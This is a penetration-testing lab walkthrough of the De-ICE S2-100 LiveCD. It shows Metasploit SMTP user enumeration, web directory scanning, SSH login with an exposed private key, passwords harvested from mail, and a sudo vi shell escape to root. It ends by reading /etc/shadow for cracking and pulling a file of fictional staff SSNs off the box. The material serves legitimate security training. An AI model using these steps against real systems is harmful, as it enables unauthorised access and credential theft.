msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/s2100users.txt
USER_FILE => /root/Desktop/s2100users.txt
msf auxiliary(smtp_enum) > set RHOSTS
msf auxiliary(smtp_enum) > run

[*]      - Banner: 220 ESMTP Sendmail 8.13.7/8.13.7; Wed, 19 Apr 2017 12:00:02 GMT
[+]      - Users found: Havisham, Magwitch, Pirrip
[*] Scanned 1 of 1 hosts (100% complete)

We now have three verified usernames to work with (Havisham, Magwitch, Pirrip). The .101 address had a readable ~root directory, so let’s check for those user directories. Good news: all three exist, although there aren’t any files visible in them either. What files would we expect to see in a user’s home folder? I made a dump of my own home folder to answer this question; some of the items are obviously penetration-testing tools. Linux hides folders that start with a ., so let’s dump this listing into a wordlist and get started.

root@kali:~# ls -a
.              core       .ICEauthority  .nano              Templates
..             Desktop    .install4j     .oracle_jre_usage  Videos
.bash_history  Documents  .java          Pictures           .w3af
.bashrc        Downloads  .john          .profile           .wget-hsts
.bundle        .faraday   .local         Public
.BurpSuite     .gconf     .mozilla       .rnd
.cache         .gnupg     .msf4          .sqlmap
.config        .halberd   Music          .ssh
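
Turning that listing into the wordlist is trivial; a quick sketch that writes one entry per line to the DICTIONARY file used by Metasploit's dir_scanner module, whose options are shown below:

# Turn the interesting dotfile names from the ls -a output into a
# one-entry-per-line wordlist for the http dir_scanner module.
dotfiles = """
.bash_history .bashrc .bundle .BurpSuite .cache .config .faraday .gconf
.gnupg .halberd .ICEauthority .install4j .java .john .local .mozilla .msf4
.nano .oracle_jre_usage .profile .rnd .sqlmap .ssh .w3af .wget-hsts
"""

with open('/root/Desktop/webwordlist.txt', 'w') as out:
    out.write('\n'.join(dotfiles.split()) + '\n')
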
Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                Required  Description
   ----        ---------------                --------  -----------
   DICTIONARY  /root/Desktop/webwordlist.txt  no        Path of word dictionary to use
   PATH        /~root                         yes       The path  to identify files
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                  yes       The target address range or CIDR identifier
   RPORT       80                             yes       The target port (TCP)
   SSL         false                          no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                            yes       The number of concurrent threads
   VHOST                                      no        HTTP server virtual host

msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[*] Found 404 (
[*] Found 404 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~magwitch
PATH => /~magwitch
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[*] Found 404 (
[*] Found 404 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~havisham
PATH => /~havisham
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[*] Found 404 (
[*] Found 404 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~pirrip
PATH => /~pirrip
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[*] Found 404 (
[*] Found 200 (
[*] Found 404 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The bolded line above doesn’t show up in the other three runs; it returns a 404, which is odd, and the /./ request comes back as a 200 instead of a 404. Let’s take a closer look.


Figure 1 – .SSH Folder

That sure looks like it exists. Let’s take a quick detour into SSH to explain why this is important. SSH allows password-based authentication, like we saw in the De-ICE series 1 LiveCDs, but it can also use public-key authentication, which relies on a generated public/private key pair. Having the id_rsa file is almost as good as having the password in cleartext. Copy those two files to your local .ssh folder and set the permissions on id_rsa to 600; Linux gets really upset if you don’t, so doing it now saves the step of getting the error message, looking up the fix, and trying again.

root@kali:~/Desktop# ssh -i id_rsa pirrip@
The authenticity of host ' (' can't be established.
RSA key fingerprint is SHA256:Z26/6SkV1lodQR++6+78wD4acFpG2KigCTuwo04+Xlw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
Linux 2.6.16.
pirrip@slax:~$ id
uid=1000(pirrip) gid=10(wheel) groups=10(wheel)
pirrip@slax:~$ su -
Password: ****

We don’t know the password, so even being a member of the wheel group doesn’t help much, and there isn’t much to work with in the file system either. In a normal penetration test you could use this system to pivot into others or upload a netcat or Meterpreter shell, but since this is the only system in scope, let’s look at other potential data sources. We know this is a mail server, so:

pirrip@slax:~$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N  1 Abel Magwitch      Sun Jan 13 23:53   20/748   Estella
 N  2 Estella Havisham   Sun Jan 13 23:53   20/780   welcome to the team
 N  3 Abel Magwitch      Sun Jan 13 23:53   20/875   havisham
 N  4 Estella Havisham   Mon Jan 14 00:05   20/861   next month
 N  5 Abel Magwitch      Mon Jan 14 00:05   20/868   vacation
 N  6 Abel Magwitch      Mon Jan 14 00:05   20/915   vacation
 N  7 noreply@fermion.he Mon Jan 14 00:05   29/983   Fermion Account Login Rem
Message  1:
From  Sun Jan 13 23:53:37 2008
Return-Path: <>
From: Abel Magwitch <>
Date: Sun, 13 Jan 2008 23:47:48 +0000
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Will do.

Message  2:
From  Sun Jan 13 23:53:37 2008
Return-Path: <>
From: Estella Havisham <>
Date: Sun, 13 Jan 2008 23:50:33 +0000
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Thanks!  Glad to be here.

Message  3:
From  Sun Jan 13 23:53:37 2008
Return-Path: <>
From: Abel Magwitch <>
Date: Sun, 13 Jan 2008 23:48:57 +0000
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

I set her up with an account on our servers.  I set her password to "changeme" and will swing by tomorrow and make sure she changes her pw.

Message  4:
From  Mon Jan 14 00:05:15 2008
Return-Path: <>
From: Estella Havisham <>
Date: Mon, 14 Jan 2008 00:03:56 +0000
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.

Message  5:
From  Mon Jan 14 00:05:15 2008
Return-Path: <>
From: Abel Magwitch <>
Date: Sun, 13 Jan 2008 23:55:41 +0000
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Hey, I'll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?

Message  6:
From  Mon Jan 14 00:05:15 2008
Return-Path: <>
From: Abel Magwitch <>
Date: Sun, 13 Jan 2008 23:58:28 +0000
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Sure - so far, she's doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.

Message  7:
From  Mon Jan 14 00:05:15 2008
Return-Path: <>
Date: Sun, 13 Jan 2008 23:54:42 +0000
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.

Fermion Support

Password: 0l1v3rTw1st

From the email exchange we have two potential sets of credentials: havisham:changeme and pirrip:0l1v3rTw1st. Let’s try to get elevated privileges with the pirrip password first, since we are already logged in.

pirrip@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

 #1) Respect the privacy of others.
 #2) Think before you type.
 #3) With great power comes great responsibility.

User pirrip may run the following commands on this host:
 (root) /usr/bin/more
 (root) /usr/bin/tail
 (root) /usr/bin/vi
 (root) /usr/bin/cat ALL

vi can be used to get a shell; I learned this in a long, drawn-out penetration test where I got a similar restricted shell through the Shellshock vulnerability. In vi, the :! command instructs vi to execute a shell command (for example, :!/bin/sh from a sudo vi session drops you into a root shell). Let’s try it.

pirrip@slax:~$ sudo vi

sh-3.1# cat /etc/shadow


Use :q to exit vi. Feed the password hashes to John or Hashcat and let them cook. Time passes, seasons change, the wedding dress becomes torn and the feast rots on the table (I had to read Charles Dickens in college).

pirrip@slax:~$ su -
Password: **************
root@slax:~# ls -a
./   .ICEauthority  .Xresources  .fluxbox/       .fonts.conf  .joerc  .kderc   .mc/       .qt/    Desktop/
../  .Xauthority    .config/     .fonts.cache-1  .icons@      .kde/   .local/  .mplayer/  .save/  Set\ IP\ address
root@slax:~# cd .save
root@slax:~/.save# ls -a
./  ../*

We found the file but how do we get it over to our system to check it out? There are a few possible options.

  1. Build a netcat listener and pipe the file over.
  2. Move the file to the FTP root and copy it across.
  3. Move it to the ~root directory and download it from the website.

Netcat is installed on the server and that is an option, but I am lazy, so I ran the following commands to copy the file to the website root and give read permissions to everyone:

/home/root/.save# cp /www/101/home/root/
chmod 744

Figure 2 – Archive on Website

After copying it to the local system, unzip the archive and untar the file from inside it.

tar -xzf great_expectations.tar

Figure 3 – Archive Contents

The greatest piece of advice that I have received on Linux is how to remember the tar switches: say the following in a thick, cartoonish German accent, ‘Extract Zee Files’ (tar -xzf). Will this sound dumb when you do it? Yes. Will you remember it without looking at the help? Also yes.

The Charles_Dickens_3.jpg and Great_Expectations.pdf files are pretty self-explanatory. Let’s look at the Jan08 file with cat.

root@kali:~/Desktop/s2-100/great_expectations# cat Jan08 
From  Sun Jan 13 23:53:37 2008
Return-Path: <>
Received: from (localhost [])
    by (8.13.7/8.13.7) with ESMTP id m0DNlmHb009636
    for <>; Sun, 13 Jan 2008 23:47:48 GMT
Received: (from
    by (8.13.7/8.13.7/Submit) id m0DNlmDI009635
    for pirrip; Sun, 13 Jan 2008 23:47:48 GMT
From: Bill Sikes <>
Message-Id: <>
Date: Sun, 13 Jan 2008 23:47:48 +0000
Subject: Raises
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here's the data for raises for your team:
Philip Pirrip:  734-67-0424 5.5% $74,224
Abel Magwitch:  816-03-0028 4.0% $53,122
Estella Havisham: 762-93-1073 12% $84,325

That is the data we were looking for. But what about that other .jpg file that won’t render a preview? It won’t open in image software; maybe someone is trying to obfuscate the file type by changing the extension? Use the file command in Linux to analyze the type.

file 363px-Charles_dickensyoung.jpg 
363px-Charles_dickensyoung.jpg: POSIX tar archive (GNU)

That’s not a JPG at all! Let’s rename the file and take a look inside; maybe that Jan08 file was a decoy. Nope, it was just a second copy of the original archive, but now you know how to use the file command. This was the best of times and the worst of times. I hope that you learned at least one thing that you will be able to put into practice in the future.